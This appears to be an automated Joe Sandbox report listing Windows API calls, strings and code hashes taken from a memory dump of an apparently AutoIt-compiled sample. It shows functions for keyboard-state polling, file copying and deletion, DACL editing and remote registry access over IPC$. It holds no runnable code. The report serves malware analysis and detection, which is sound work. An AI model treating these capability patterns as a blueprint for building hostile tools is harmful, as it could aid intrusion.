• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
• String ID:
• API String ID: 3840717409-0
• Opcode ID: 8c000ac7e4524906e2065b3b83d51dc3a7fb7fdd56f0875435d7bde4fb0e8500
• Instruction ID: 57d3c7ec33adf2328f8381ef91b7be63e95302b67896ce158e72b471f8eb61f6
• Opcode Fuzzy Hash: 8c000ac7e4524906e2065b3b83d51dc3a7fb7fdd56f0875435d7bde4fb0e8500
• Instruction Fuzzy Hash: 0F416C79601205EFDB119F64EC4CEAA7BB8EF89711F104058F906D72A0D730AD54DB20
APIs
• __wsplitpath.LIBCMT ref: 00250C93
• _wcscat.LIBCMT ref: 00250CAB
• _wcscat.LIBCMT ref: 00250CBD
• GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00250CD2
• SetCurrentDirectoryW.KERNEL32(?), ref: 00250CE6
• GetFileAttributesW.KERNEL32(?), ref: 00250CFE
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00250D18
• SetCurrentDirectoryW.KERNEL32(?), ref: 00250D2A
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
• String ID: *.*
• API String ID: 34673085-438819550
• Opcode ID: 3a15d61e595f1ecdfe3671fe7901402e1e3f182be8a4c611f8c75aaf9fe06de2
• Instruction ID: f667b835a14d9be982958711def01ecf2b2a23c53eda6692f7b031ad2e040085
                                                                                                                • Opcode Fuzzy Hash: 3a15d61e595f1ecdfe3671fe7901402e1e3f182be8a4c611f8c75aaf9fe06de2
                                                                                                                • Instruction Fuzzy Hash: D981D3715243069FC724DF64CCC4AAEB3E8AB99306F14892AFC85C7251E730ED98CB56
APIs
  • Part of subcall function 0021AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0021AF8E
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0026ED0C
• GetFocus.USER32 ref: 0026ED1C
• GetDlgCtrlID.USER32(00000000), ref: 0026ED27
• _memset.LIBCMT ref: 0026EE52
• GetMenuItemInfoW.USER32 ref: 0026EE7D
• GetMenuItemCount.USER32(00000000), ref: 0026EE9D
• GetMenuItemID.USER32(?,00000000), ref: 0026EEB0
• GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0026EEE4
• GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0026EF2C
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0026EF64
• DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0026EF99
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
• String ID: 0
• API String ID: 1296962147-4108050209
• Opcode ID: 6b25aed58a423cf14e822c5d7c49d78e4b621714f53649bd56134cea703283df
• Instruction ID: d3d9ed6fc826d57ba627ecb55571c81dd159cb4fdac3fc5ed45832ca28695245
• Opcode Fuzzy Hash: 6b25aed58a423cf14e822c5d7c49d78e4b621714f53649bd56134cea703283df
• Instruction Fuzzy Hash: C181E179128312AFDB10CF14D888E6BBBE8FF88314F11092DF99497291D770D9A5CB92
APIs
  • Part of subcall function 0023B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0023B903
  • Part of subcall function 0023B8E7: GetLastError.KERNEL32(?,0023B3CB,?,?,?), ref: 0023B90D
  • Part of subcall function 0023B8E7: GetProcessHeap.KERNEL32(00000008,?,?,0023B3CB,?,?,?), ref: 0023B91C
  • Part of subcall function 0023B8E7: HeapAlloc.KERNEL32(00000000,?,0023B3CB,?,?,?), ref: 0023B923
  • Part of subcall function 0023B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0023B93A
  • Part of subcall function 0023B982: GetProcessHeap.KERNEL32(00000008,0023B3E1,00000000,00000000,?,0023B3E1,?), ref: 0023B98E
  • Part of subcall function 0023B982: HeapAlloc.KERNEL32(00000000,?,0023B3E1,?), ref: 0023B995
  • Part of subcall function 0023B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0023B3E1,?), ref: 0023B9A6
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0023B5F7
• _memset.LIBCMT ref: 0023B60C
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0023B62B
• GetLengthSid.ADVAPI32(?), ref: 0023B63C
• GetAce.ADVAPI32(?,00000000,?), ref: 0023B679
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0023B695
• GetLengthSid.ADVAPI32(?), ref: 0023B6B2
• GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0023B6C1
• HeapAlloc.KERNEL32(00000000), ref: 0023B6C8
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 0023B6E9
• CopySid.ADVAPI32(00000000), ref: 0023B6F0
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0023B721
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0023B747
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 0023B75B
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
• String ID:
• API String ID: 3996160137-0
• Opcode ID: c121d332acd1e692e4462add40046af1967ff2cd8e06aa979bd57cdbd3ec56db
• Instruction ID: 29e1f7cdca4292c7c3717f2205369706ab09e394b657bbf5a16ef665325ebcf6
• Opcode Fuzzy Hash: c121d332acd1e692e4462add40046af1967ff2cd8e06aa979bd57cdbd3ec56db
• Instruction Fuzzy Hash: CD514CB591020AAFDF019FA4DC49EEEBB79FF44304F048159FA15AB291DB319A15CF60
APIs
• GetDC.USER32(00000000), ref: 0025A2DD
• CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0025A2E9
• CreateCompatibleDC.GDI32(?), ref: 0025A2F5
• SelectObject.GDI32(00000000,?), ref: 0025A302
• StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0025A356
• GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 0025A392
• GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0025A3B6
• SelectObject.GDI32(00000006,?), ref: 0025A3BE
• DeleteObject.GDI32(?), ref: 0025A3C7
• DeleteDC.GDI32(00000006), ref: 0025A3CE
• ReleaseDC.USER32(00000000,?), ref: 0025A3D9
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
• String ID: (
• API String ID: 2598888154-3887548279
• Opcode ID: 5d29af57d02e4883ba8a19d6e4d2c63121f38b7552febc303fc7db7e82cb4c21
• Instruction ID: 6f6bfdc33754e4fb46154fbaeeba90e58df53e2be97f158e7f08810eaaf5d3b2
• Opcode Fuzzy Hash: 5d29af57d02e4883ba8a19d6e4d2c63121f38b7552febc303fc7db7e82cb4c21
• Instruction Fuzzy Hash: D1516775910309EFCB10CFA8DC89EAEBBB9EF48310F14851DF98AA7250C731A855CB64
APIs
• CharUpperBuffW.USER32(?,?,?,?,?,?,?,00262AA6,?,?), ref: 00263B0E
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: BuffCharUpper
• String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU$|E+
• API String ID: 3964851224-2060638737
• Opcode ID: 3ac3759d4a038a59f670c740e755369a8aef1a7c82d77b28b9660abe792899ef
• Instruction ID: 4d7b960b8a913436485ef8913156e193efd0df0d59f9d4a1cd5f03da9ed679bf
• Opcode Fuzzy Hash: 3ac3759d4a038a59f670c740e755369a8aef1a7c82d77b28b9660abe792899ef
• Instruction Fuzzy Hash: 4341A2341302468BDF04EF04D980AEA3365BF65394F550835FC615B29ADB709EB9CF60
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00273C64,00000010,00000000,Bad directive syntax error,0029DBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 002432D1
• LoadStringW.USER32(00000000,?,00273C64,00000010), ref: 002432D8
  • Part of subcall function 0020CAEE: _memmove.LIBCMT ref: 0020CB2F
• _wprintf.LIBCMT ref: 00243309
• __swprintf.LIBCMT ref: 0024332B
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 00243395
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
• String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:$",
• API String ID: 1506413516-2717366030
• Opcode ID: 90832c938b467bf92a2834c79147480829da576def22034b130fca0bf28c9a62
• Instruction ID: 86ebb43fa5a49756779e3123f3ef66c06263501758f4e5f7b1f5cc649b52f0ee
• Opcode Fuzzy Hash: 90832c938b467bf92a2834c79147480829da576def22034b130fca0bf28c9a62
• Instruction Fuzzy Hash: E4214D3186031DBBDF05EF90DC0AEEE7779BF14700F004456B505A10A2DA72AA78DFA1
                                                                                                                APIs
                                                                                                                • LoadStringW.USER32(00000066,?,00000FFF), ref: 0024D567
                                                                                                                  • Part of subcall function 0020CAEE: _memmove.LIBCMT ref: 0020CB2F
                                                                                                                • LoadStringW.USER32(?,?,00000FFF,?), ref: 0024D589
                                                                                                                • __swprintf.LIBCMT ref: 0024D5DC
                                                                                                                • _wprintf.LIBCMT ref: 0024D68D
                                                                                                                • _wprintf.LIBCMT ref: 0024D6AB
                                                                                                                Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: LoadString_wprintf$__swprintf_memmove
• String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
• API String ID: 2116804098-2391861430
APIs
• LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 0024D37F
  • Part of subcall function 0020CAEE: _memmove.LIBCMT ref: 0020CB2F
• LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0024D3A0
• __swprintf.LIBCMT ref: 0024D3F3
• _wprintf.LIBCMT ref: 0024D499
• _wprintf.LIBCMT ref: 0024D4B7
Similarity
• API ID: LoadString_wprintf$__swprintf_memmove
• String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
• API String ID: 2116804098-3420473620
APIs
  • Part of subcall function 00207E53: _memmove.LIBCMT ref: 00207EB9
• _memset.LIBCMT ref: 0023AF74
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0023AFA9
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0023AFC5
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0023AFE1
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0023B00B
• CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0023B033
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0023B03E
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0023B043
Similarity
• API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
• String ID: SOFTWARE\Classes\$\CLSID$\IPC$
• API String ID: 1411258926-22481851
APIs
• __swprintf.LIBCMT ref: 00247226
• __swprintf.LIBCMT ref: 00247233
  • Part of subcall function 0022234B: __woutput_l.LIBCMT ref: 002223A4
• FindResourceW.KERNEL32(?,?,0000000E), ref: 0024725D
• LoadResource.KERNEL32(?,00000000), ref: 00247269
• LockResource.KERNEL32(00000000), ref: 00247276
• FindResourceW.KERNEL32(?,?,00000003), ref: 00247296
• LoadResource.KERNEL32(?,00000000), ref: 002472A8
• SizeofResource.KERNEL32(?,00000000), ref: 002472B7
• LockResource.KERNEL32(?), ref: 002472C3
• CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00247322
Similarity
• API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
• String ID: L6+
• API String ID: 1433390588-2741093763
APIs
  • Part of subcall function 00207E53: _memmove.LIBCMT ref: 00207EB9
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0024843F
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00248455
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00248466
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00248478
• mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00248489
Similarity
• API ID: SendString$_memmove
• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
• API String ID: 2279737902-1007645807
APIs
• timeGetTime.WINMM ref: 0024809C
  • Part of subcall function 0021E3A5: timeGetTime.WINMM(?,76C1B400,00276163), ref: 0021E3A9
• Sleep.KERNEL32(0000000A), ref: 002480C8
• EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 002480EC
• FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 0024810E
• SetActiveWindow.USER32 ref: 0024812D
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0024813B
• SendMessageW.USER32(00000010,00000000,00000000), ref: 0024815A
• Sleep.KERNEL32(000000FA), ref: 00248165
• IsWindow.USER32 ref: 00248171
• EndDialog.USER32(00000000), ref: 00248182
Similarity
• API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
• String ID: BUTTON
• API String ID: 1194449130-3405671355
Similarity
• API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
• String ID: 0.0.0.0
• API String ID: 208665112-3771769585
APIs
  • Part of subcall function 0024C6A0: __time64.LIBCMT ref: 0024C6AA
  • Part of subcall function 002041A7: _fseek.LIBCMT ref: 002041BF
• __wsplitpath.LIBCMT ref: 0024C96F
  • Part of subcall function 0022297D: __wsplitpath_helper.LIBCMT ref: 002229BD
• _wcscpy.LIBCMT ref: 0024C982
• _wcscat.LIBCMT ref: 0024C995
• __wsplitpath.LIBCMT ref: 0024C9BA
• _wcscat.LIBCMT ref: 0024C9D0
• _wcscat.LIBCMT ref: 0024C9E3
  • Part of subcall function 0024C6E4: _memmove.LIBCMT ref: 0024C71D
  • Part of subcall function 0024C6E4: _memmove.LIBCMT ref: 0024C72C
• _wcscmp.LIBCMT ref: 0024C92A
  • Part of subcall function 0024CE59: _wcscmp.LIBCMT ref: 0024CF49
  • Part of subcall function 0024CE59: _wcscmp.LIBCMT ref: 0024CF5C
• DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0024CB8D
• DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0024CC24
• CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0024CC3A
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0024CC4B
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0024CC5D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 152968663-0
                                                                                                                • Opcode ID: 91d5c2a05c6314dd7d98c2e22d2ee6937acd40f093dfbb837e0024de78e59b9d
                                                                                                                • Instruction ID: 81c3d61eed4d5862ef51f15ceb68e1253662f824ddd40c1f95c48ceaaf5cf9eb
                                                                                                                • Opcode Fuzzy Hash: 91d5c2a05c6314dd7d98c2e22d2ee6937acd40f093dfbb837e0024de78e59b9d
                                                                                                                • Instruction Fuzzy Hash: 3DC15AB1911229AECF14DFA5CC81EEEB7BDEF49310F1040AAF609E6151DB709A94CF61
APIs
Similarity
• API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
• String ID:
• API String ID: 3566271842-0
• Opcode ID: b205b6be9141ec4e6d146701fe46bf9c896d762395f37a84b5ee12fc62dd72de
• Instruction ID: eb3eef11a8b92940f357ea8175f7481a2a027bf986c1f2f85660ec4b8449ec19
• Opcode Fuzzy Hash: b205b6be9141ec4e6d146701fe46bf9c896d762395f37a84b5ee12fc62dd72de
• Instruction Fuzzy Hash: 8D713DB5A10219AFDB14DFA4D888EDEB7B8FF48314F048495E909AB252D730EE54CF94
APIs
• GetKeyboardState.USER32(?), ref: 00243908
• SetKeyboardState.USER32(?), ref: 00243973
• GetAsyncKeyState.USER32(000000A0), ref: 00243993
• GetKeyState.USER32(000000A0), ref: 002439AA
• GetAsyncKeyState.USER32(000000A1), ref: 002439D9
• GetKeyState.USER32(000000A1), ref: 002439EA
• GetAsyncKeyState.USER32(00000011), ref: 00243A16
• GetKeyState.USER32(00000011), ref: 00243A24
• GetAsyncKeyState.USER32(00000012), ref: 00243A4D
• GetKeyState.USER32(00000012), ref: 00243A5B
• GetAsyncKeyState.USER32(0000005B), ref: 00243A84
• GetKeyState.USER32(0000005B), ref: 00243A92
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: b8872f86e9bd95fe8b32ffba1126f5a54425a75d65085333ceae147ef65c4c90
• Instruction ID: a013fc79c138992d6a3e7c79ff4dbfa7e53798d05b75fe3711b9a1d9f99d1eae
• Opcode Fuzzy Hash: b8872f86e9bd95fe8b32ffba1126f5a54425a75d65085333ceae147ef65c4c90
• Instruction Fuzzy Hash: 6851C730A1479929FB39EFB488117EAFFF45F11340F08859ED5C25A1C2DA54AB9CCB62
APIs
• GetDlgItem.USER32(?,00000001), ref: 0023FB19
• GetWindowRect.USER32(00000000,?), ref: 0023FB2B
• MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0023FB89
• GetDlgItem.USER32(?,00000002), ref: 0023FB94
• GetWindowRect.USER32(00000000,?), ref: 0023FBA6
• MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0023FBFC
• GetDlgItem.USER32(?,000003E9), ref: 0023FC0A
• GetWindowRect.USER32(00000000,?), ref: 0023FC1B
• MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0023FC5E
• GetDlgItem.USER32(?,000003EA), ref: 0023FC6C
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0023FC89
• InvalidateRect.USER32(?,00000000,00000001), ref: 0023FC96
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• String ID:
• API String ID: 3096461208-0
• Opcode ID: af5847069cdfb5aeefb9e7f257d0c2fbec43a430f5470d8e751c6356c307e4d6
• Instruction ID: b0ae206d144aac9aea5e78db937809d81310dc912301b1ee4b28dc5fbf97fb58
• Opcode Fuzzy Hash: af5847069cdfb5aeefb9e7f257d0c2fbec43a430f5470d8e751c6356c307e4d6
• Instruction Fuzzy Hash: FF5133B5B00209AFDB08DF68ED99E6EBBBAEB88314F148539F915D72D0D7709D048B10
APIs
  • Part of subcall function 002049CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00204954,00000000), ref: 00204A23
• DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0021B85B), ref: 0021B926
• KillTimer.USER32(00000000,?,00000000,?,?,?,?,0021B85B,00000000,?,?,0021AF1E,?,?), ref: 0021B9BD
• DestroyAcceleratorTable.USER32(00000000), ref: 0027E775
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0021B85B,00000000,?,?,0021AF1E,?,?), ref: 0027E7A6
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0021B85B,00000000,?,?,0021AF1E,?,?), ref: 0027E7BD
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0021B85B,00000000,?,?,0021AF1E,?,?), ref: 0027E7D9
• DeleteObject.GDI32(00000000), ref: 0027E7EB
Similarity
• API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
• String ID:
• API String ID: 641708696-0
• Opcode ID: 9436cedc8ae7a781e539d44e03c2f1829d88d3146d60f66e1134ebc06e5d133d
• Instruction ID: de44e343401a407cf80a12b01553cc81127343f8880f9150a235431001a777d2
• Opcode Fuzzy Hash: 9436cedc8ae7a781e539d44e03c2f1829d88d3146d60f66e1134ebc06e5d133d
• Instruction Fuzzy Hash: FA61CA34124702CFEB26AF25E88DB65B7F5FF6A311F114219E18A865B1C770A8B1DF50
APIs
  • Part of subcall function 0021B155: GetWindowLongW.USER32(?,000000EB), ref: 0021B166
• GetSysColor.USER32(0000000F), ref: 0021B067
Similarity
• API ID: ColorLongWindow
• String ID:
• API String ID: 259745315-0
• Opcode ID: a597c0a6c8776ac2b93bbe8f85cbce59a6f55ce07c5c3dbe6a77d5bd22255bca
• Instruction ID: 7ce977354aeb2513e23424d07e1f7571de764320cbe7ebcf0cb2f36e17337fb6
• Opcode Fuzzy Hash: a597c0a6c8776ac2b93bbe8f85cbce59a6f55ce07c5c3dbe6a77d5bd22255bca
• Instruction Fuzzy Hash: 2441A335110141ABDF325F28E88DBFA37B6AB1A730F154365FD698A1E1D7308C91DB22
APIs
Similarity
• API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
• String ID:
• API String ID: 136442275-0
• Opcode ID: 1a0db463db38c7345d51abaaf3d2665ccc2fbd5a24ae5a5451bad160a5c22f04
• Instruction ID: 1a2068f91997f7e5b99361edf371b9b2be8af1be9e1ee2bf644b7f7373d27e91
• Opcode Fuzzy Hash: 1a0db463db38c7345d51abaaf3d2665ccc2fbd5a24ae5a5451bad160a5c22f04
• Instruction Fuzzy Hash: 3E4110B291412CAADF25EB90DC51EEE73BCAB18310F1041E6F519A2051EB75AFE4CF64
APIs
• __swprintf.LIBCMT ref: 002084E5
• __itow.LIBCMT ref: 00208519
  • Part of subcall function 00222177: _xtow@16.LIBCMT ref: 00222198
Strings
                                                                                                                Similarity
                                                                                                                • API ID: __itow__swprintf_xtow@16
                                                                                                                • String ID: %.15g$0x%p$False$True
                                                                                                                • API String ID: 1502193981-2263619337
APIs
• _memset.LIBCMT ref: 00225CCA
  • Part of subcall function 0022889E: __getptd_noexit.LIBCMT ref: 0022889E
• __gmtime64_s.LIBCMT ref: 00225D63
• __gmtime64_s.LIBCMT ref: 00225D99
• __gmtime64_s.LIBCMT ref: 00225DB6
• __allrem.LIBCMT ref: 00225E0C
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00225E28
• __allrem.LIBCMT ref: 00225E3F
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00225E5D
• __allrem.LIBCMT ref: 00225E74
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00225E92
• __invoke_watson.LIBCMT ref: 00225F03
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
• String ID:
• API String ID: 384356119-0
APIs
• _memset.LIBCMT ref: 00245816
• GetMenuItemInfoW.USER32(002C18F0,000000FF,00000000,00000030), ref: 00245877
• SetMenuItemInfoW.USER32(002C18F0,00000004,00000000,00000030), ref: 002458AD
• Sleep.KERNEL32(000001F4), ref: 002458BF
• GetMenuItemCount.USER32(?), ref: 00245903
